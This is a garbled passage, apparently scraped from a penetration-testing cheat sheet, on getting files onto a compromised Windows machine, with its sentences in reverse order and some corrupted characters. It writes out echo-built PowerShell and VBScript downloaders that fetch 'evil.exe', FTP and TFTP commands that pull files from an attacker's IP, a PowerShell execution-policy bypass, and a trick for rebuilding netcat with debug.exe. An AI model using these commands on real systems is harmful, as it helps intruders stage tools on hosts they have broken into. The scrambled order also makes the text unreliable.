Now we just copy-past the text into our windows-shell. So now let's disassemble it: wine exe2bat.exe nc.exe nc.txt So we need to use files smaller than that. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.ĭebug.exe can only assemble 64 kb. So the idea is that we take a binaries, like netcat. It is used to inspect binaries, like a debugger. Basically the idea is to use the debug.exe program. This is a crazy technique that works on windows 32 bit machines. Now we invoke it with this crazy syntax: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 But we can get around that by creaing a PowerShell-script and then executing the script: echo $storageDir = $pwd > wget.ps1Įcho $webclient = New-Object >wget.ps1Įcho $file = "output-file.exe" >wget.ps1Įcho $webclient.DownloadFile($url,$file) >wget.ps1 Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that.
This is how we can download a file using PowerShell. You then execute the script like this: cscript wget.vbs evil.exe echo strUrl = (0) > wget.vbsĮcho StrFile = (1) > wget.vbsĮcho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 > wget.vbsĮcho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 > wget.vbsĮcho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 > wget.vbsĮcho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 > wget.vbsĮcho Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts > wget.vbsĮcho Set http = CreateObject("WinHttp.WinHttpRequest.5.1") > wget.vbsĮcho If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") > wget.vbsĮcho If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") > wget.vbsĮcho If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") > wget.vbsĮcho http.Open "GET",strURL,False > wget.vbsĮcho varByteArray = http.ResponseBody > wget.vbsĮcho Set fs = CreateObject("Scripting.FileSystemObject") > wget.vbsĮcho Set ts = fs.CreateTextFile(StrFile,True) > wget.vbsĮcho For lngCounter = 0 to UBound(varByteArray) > wget.vbsĮcho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) > wget.vbs If it doesn't work try piping it through unix2dos before copying it. Here is a good script to make a wget-clone in VB. If you want to make sure that the file was uploaded correct you can check in the syslog. I usually put all files I want to make available in /srv/tftp If you like to test that the tftp-server is working you can test it from Linux, I don't think it has a non-interactive way. So now you can upload and download whatever from the windows-machine like this tftp -i 192.160.1.101 GET wget.exe You can see it running like this netstat -a -p UDP | grep udp So if you run netstat it will not show it as listening. Now you can put stuff in /srv/tftp and it will be served. You can server up some files with it like this atftpd -daemon -port 69 /tftp Which means less risk of losing your shell. What is good about TFTP is that you can use it non-interactively. TFTPĪ TFTP client is installed by default on windows machines up to Windows XP and Windows 2003. Of course you need to have a ftp-server configured with the user asshat and the password to mysecretpassword. Then run this command to connect to the ftp ftp -v -n -s:ftp.txt On the compromised machine we echo out the following commands into a file echo open 192.168.1.101 21> ftp.txt And then use that as our input to the ftp-client. So what we want to do is to echo out the commands into a textfile. But we can't use it interactively since that most likely would kill our shell. Most windows machines have a ftp-client included. We can use netcat, wget, or curl, which most systems have as default. Transferring files to Linux is usually pretty easy. Common ports\/services and how to use themīroken Authentication or Session Managementĭefault Layout of Apache on Different Versions
0 kommentar(er)
